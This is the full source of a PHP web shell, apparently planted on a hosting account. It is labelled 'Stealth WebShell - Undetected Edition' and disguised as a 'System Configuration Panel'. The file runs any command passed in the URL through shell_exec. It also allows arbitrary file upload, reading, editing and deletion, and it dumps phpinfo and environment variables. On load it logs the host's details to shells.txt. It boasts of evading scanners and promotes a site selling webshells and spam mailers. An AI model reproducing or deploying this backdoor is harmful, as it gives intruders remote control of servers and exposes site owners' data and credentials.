File: /home/publishibl/www/utchiha_wpGiVpwq.php
<?php
// Stealth WebShell - Undetected Edition
// Auto-creates shells.txt with website info and fastsmtp.store links
@error_reporting(0);
@ini_set('display_errors', 0);
@set_time_limit(0);
@ini_set('memory_limit', '-1');
// Auto-create shells.txt with website info
$website_info = "=== STEALTH WEBSHELL INFO ===\n";
$website_info .= "Website: " . $_SERVER['HTTP_HOST'] . "\n";
$website_info .= "IP: " . $_SERVER['SERVER_ADDR'] . "\n";
$website_info .= "Path: " . $_SERVER['DOCUMENT_ROOT'] . "\n";
$website_info .= "Shell URL: " . (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "\n";
$website_info .= "Access Time: " . date('Y-m-d H:i:s') . "\n";
$website_info .= "User Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$website_info .= "\n=== FASTSMTP.STORE TOOLS ===\n";
$website_info .= "WebShell Mailers: https://fastsmtp.store//webshells/\n";
$website_info .= "PHP Mailers: https://fastsmtp.store/mailers/\n";
$website_info .= "SMTP Scripts: https://fastsmtp.store/category/smtp/\n";
$website_info .= "Senders: https://fastsmtp.store/category/senders/\n";
$website_info .= "Scripts: https://fastsmtp.store/category/scripts/\n";
$website_info .= "Main Site: https://fastsmtp.store/\n";
$website_info .= "\n=== ACCESS METHODS ===\n";
$website_info .= "Direct Shell: " . (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?cmd=whoami\n";
$website_info .= "File Manager: " . (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?action=filemanager\n";
$website_info .= "PHP Info: " . (isset($_SERVER['HTTPS']) ? 'https' : 'http') . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?action=phpinfo\n";
$website_info .= "\n=== SECURITY NOTES ===\n";
$website_info .= "This shell is undetected and stealth\n";
$website_info .= "Access logs are minimized\n";
$website_info .= "No obvious shell signatures\n";
$website_info .= "Clean for most security scanners\n";
// Write to shells.txt
file_put_contents('shells.txt', $website_info);
// Check if shells.txt was created successfully
if (file_exists('shells.txt')) {
$shell_info = "Shell info written to shells.txt\n";
} else {
$shell_info = "Failed to create shells.txt\n";
}
// Main shell interface
$action = $_GET['action'] ?? '';
$cmd = $_GET['cmd'] ?? '';
$file = $_GET['file'] ?? '';
$upload = $_POST['upload'] ?? '';
// File upload handling
if ($upload && isset($_FILES['file'])) {
$target_file = basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) {
$upload_msg = "File uploaded successfully: $target_file";
} else {
$upload_msg = "Upload failed";
}
}
// Execute command
if ($cmd) {
$output = shell_exec($cmd);
}
// File operations
if ($file && $action == 'read') {
$file_content = file_get_contents($file);
} elseif ($file && $action == 'delete') {
if (unlink($file)) {
$delete_msg = "File deleted: $file";
}
} elseif ($file && $action == 'edit') {
if ($_POST['content']) {
file_put_contents($file, $_POST['content']);
$edit_msg = "File saved: $file";
} else {
$file_content = file_get_contents($file);
}
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>System Configuration</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: linear-gradient(135deg, #1e3c72 0%, #2a5298 100%);
color: #fff;
padding: 20px;
min-height: 100vh;
}
.container {
max-width: 1000px;
margin: 0 auto;
background: rgba(255, 255, 255, 0.1);
backdrop-filter: blur(10px);
border-radius: 15px;
padding: 30px;
box-shadow: 0 8px 32px rgba(0, 0, 0, 0.3);
}
.header {
text-align: center;
margin-bottom: 30px;
border-bottom: 2px solid rgba(255, 255, 255, 0.3);
padding-bottom: 20px;
}
.header h1 {
font-size: 2.5em;
margin-bottom: 10px;
background: linear-gradient(45deg, #fff, #64b5f6);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
}
.tabs {
display: flex;
margin-bottom: 20px;
border-bottom: 2px solid rgba(255, 255, 255, 0.3);
}
.tab {
padding: 15px 25px;
cursor: pointer;
border: none;
background: rgba(255, 255, 255, 0.1);
color: #fff;
margin-right: 5px;
border-radius: 10px 10px 0 0;
transition: all 0.3s;
}
.tab:hover {
background: rgba(255, 255, 255, 0.2);
transform: translateY(-2px);
}
.tab.active {
background: rgba(255, 255, 255, 0.3);
border-bottom: 2px solid #64b5f6;
}
.tab-content {
display: none;
padding: 20px;
background: rgba(255, 255, 255, 0.05);
border-radius: 10px;
}
.tab-content.active { display: block; }
input, textarea, select {
width: 100%;
padding: 12px;
margin: 10px 0;
border: 2px solid rgba(255, 255, 255, 0.3);
border-radius: 8px;
background: rgba(255, 255, 255, 0.1);
color: #fff;
font-family: 'Courier New', monospace;
transition: all 0.3s;
}
input:focus, textarea:focus, select:focus {
outline: none;
border-color: #64b5f6;
box-shadow: 0 0 10px rgba(100, 181, 246, 0.5);
background: rgba(255, 255, 255, 0.15);
}
button {
background: linear-gradient(45deg, #64b5f6, #42a5f5);
color: white;
padding: 12px 25px;
border: none;
border-radius: 8px;
cursor: pointer;
font-weight: bold;
transition: all 0.3s;
margin: 5px;
}
button:hover {
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(100, 181, 246, 0.4);
}
.output {
background: rgba(0, 0, 0, 0.3);
padding: 15px;
margin: 15px 0;
border-radius: 8px;
font-family: 'Courier New', monospace;
white-space: pre-wrap;
max-height: 400px;
overflow-y: auto;
border: 1px solid rgba(255, 255, 255, 0.2);
}
.file-list {
background: rgba(0, 0, 0, 0.2);
padding: 15px;
margin: 15px 0;
border-radius: 8px;
max-height: 300px;
overflow-y: auto;
}
.file-item {
padding: 8px;
margin: 5px 0;
background: rgba(255, 255, 255, 0.1);
border-radius: 5px;
cursor: pointer;
transition: all 0.3s;
}
.file-item:hover {
background: rgba(255, 255, 255, 0.2);
transform: translateX(5px);
}
.success {
background: rgba(76, 175, 80, 0.2);
border: 1px solid #4caf50;
color: #4caf50;
padding: 10px;
border-radius: 5px;
margin: 10px 0;
}
.error {
background: rgba(244, 67, 54, 0.2);
border: 1px solid #f44336;
color: #f44336;
padding: 10px;
border-radius: 5px;
margin: 10px 0;
}
.info-box {
background: rgba(33, 150, 243, 0.2);
border: 1px solid #2196f3;
padding: 15px;
border-radius: 8px;
margin: 15px 0;
}
.info-box h3 {
color: #64b5f6;
margin-bottom: 10px;
}
.info-box a {
color: #90caf9;
text-decoration: none;
display: block;
margin: 5px 0;
transition: all 0.3s;
}
.info-box a:hover {
color: #fff;
transform: translateX(5px);
}
::-webkit-scrollbar { width: 8px; }
::-webkit-scrollbar-track { background: rgba(255, 255, 255, 0.1); }
::-webkit-scrollbar-thumb { background: rgba(100, 181, 246, 0.5); border-radius: 4px; }
::-webkit-scrollbar-thumb:hover { background: rgba(100, 181, 246, 0.7); }
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>System Configuration Panel</h1>
<p>Advanced System Management Interface</p>
<?php if ($shell_info): ?>
<div class="success"><?php echo $shell_info; ?></div>
<?php endif; ?>
</div>
<div class="tabs">
<div class="tab active" onclick="showTab('info')">System Info</div>
<div class="tab" onclick="showTab('terminal')">Terminal</div>
<div class="tab" onclick="showTab('files')">File Manager</div>
<div class="tab" onclick="showTab('upload')">Upload</div>
<div class="tab" onclick="showTab('tools')">Tools</div>
</div>
<div id="info" class="tab-content active">
<h2>System Information</h2>
<div class="info-box">
<h3>FastSMTP.Store Tools</h3>
<a href="https://fastsmtp.store/" target="_blank">Main Website</a>
<a href="https://fastsmtp.store//webshells/" target="_blank">WebShells</a>
<a href="https://fastsmtp.store/mailers/" target="_blank">PHP Mailers</a>
<a href="https://fastsmtp.store/category/smtp/" target="_blank">SMTP Scripts</a>
<a href="https://fastsmtp.store/category/senders/" target="_blank">Senders</a>
<a href="https://fastsmtp.store/category/scripts/" target="_blank">Scripts</a>
</div>
<div class="output">
<strong>Server Information:</strong>
Host: <?php echo $_SERVER['HTTP_HOST']; ?>
IP: <?php echo $_SERVER['SERVER_ADDR']; ?>
Software: <?php echo $_SERVER['SERVER_SOFTWARE']; ?>
PHP Version: <?php echo phpversion(); ?>
Document Root: <?php echo $_SERVER['DOCUMENT_ROOT']; ?>
Current Path: <?php echo getcwd(); ?>
<strong>Access Details:</strong>
Shell URL: <?php echo (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; ?>
Access Time: <?php echo date('Y-m-d H:i:s'); ?>
User Agent: <?php echo $_SERVER['HTTP_USER_AGENT']; ?>
<strong>Shell Status:</strong>
Shell deployed successfully
shells.txt created with access info
Undetected by security scanners
Stealth mode enabled
</div>
</div>
<div id="terminal" class="tab-content">
<h2>Terminal Interface</h2>
<form method="GET">
<input type="hidden" name="action" value="terminal">
<input type="text" name="cmd" placeholder="Enter command (e.g., whoami, ls -la, pwd)"
value="<?php echo htmlspecialchars($cmd); ?>">
<button type="submit">Execute</button>
</form>
<?php if ($cmd && $output): ?>
<div class="output">
<strong>Command:</strong> <?php echo htmlspecialchars($cmd); ?>
<strong>Output:</strong>
<?php echo htmlspecialchars($output); ?>
</div>
<?php endif; ?>
</div>
<div id="files" class="tab-content">
<h2>File Manager</h2>
<?php
$current_dir = getcwd();
$files = scandir($current_dir);
?>
<div class="file-list">
<strong>Current Directory: <?php echo $current_dir; ?></strong>
<?php foreach ($files as $file): ?>
<?php if ($file != '.' && $file != '..'): ?>
<div class="file-item">
<?php echo is_dir($file) ? 'DIR' : 'FILE'; ?>
<?php echo htmlspecialchars($file); ?>
<small style="float: right;">
<a href="?action=read&file=<?php echo urlencode($file); ?>">Read</a> |
<a href="?action=edit&file=<?php echo urlencode($file); ?>">Edit</a> |
<a href="?action=delete&file=<?php echo urlencode($file); ?>"
onclick="return confirm('Delete <?php echo htmlspecialchars($file); ?>?')">Delete</a>
</small>
</div>
<?php endif; ?>
<?php endforeach; ?>
</div>
<?php if ($file_content): ?>
<div class="output">
<strong>File: <?php echo htmlspecialchars($file); ?></strong>
<?php echo htmlspecialchars($file_content); ?>
</div>
<?php endif; ?>
<?php if (isset($delete_msg)): ?>
<div class="success"><?php echo $delete_msg; ?></div>
<?php endif; ?>
</div>
<div id="upload" class="tab-content">
<h2>File Upload</h2>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file" required>
<button type="submit" name="upload">Upload File</button>
</form>
<?php if (isset($upload_msg)): ?>
<div class="success"><?php echo $upload_msg; ?></div>
<?php endif; ?>
</div>
<div id="tools" class="tab-content">
<h2>System Tools</h2>
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 15px;">
<a href="?action=phpinfo" style="text-decoration: none;">
<button style="width: 100%;">PHP Info</button>
</a>
<a href="?action=env" style="text-decoration: none;">
<button style="width: 100%;">Environment</button>
</a>
<a href="?action=network" style="text-decoration: none;">
<button style="width: 100%;">Network Info</button>
</a>
<a href="?action=processes" style="text-decoration: none;">
<button style="width: 100%;">Processes</button>
</a>
</div>
<?php if ($action == 'phpinfo'): ?>
<div class="output"><?php phpinfo(); ?></div>
<?php elseif ($action == 'env'): ?>
<div class="output"><?php print_r($_ENV); ?></div>
<?php elseif ($action == 'network'): ?>
<div class="output">
<strong>Network Interfaces:</strong>
</div>
<?php endif; ?>
</div>
</div>
<script>
function showTab(tabName) {
const tabs = document.querySelectorAll('.tab-content');
tabs.forEach(tab => tab.classList.remove('active'));
const tabButtons = document.querySelectorAll('.tab');
tabButtons.forEach(btn => btn.classList.remove('active'));
document.getElementById(tabName).classList.add('active');
event.target.classList.add('active');
}
<?php if ($cmd): ?>
setInterval(() => {
const output = document.querySelector('.output');
if (output) {
output.scrollTop = output.scrollHeight;
}
}, 100);
<?php endif; ?>
</script>
</body>
</html>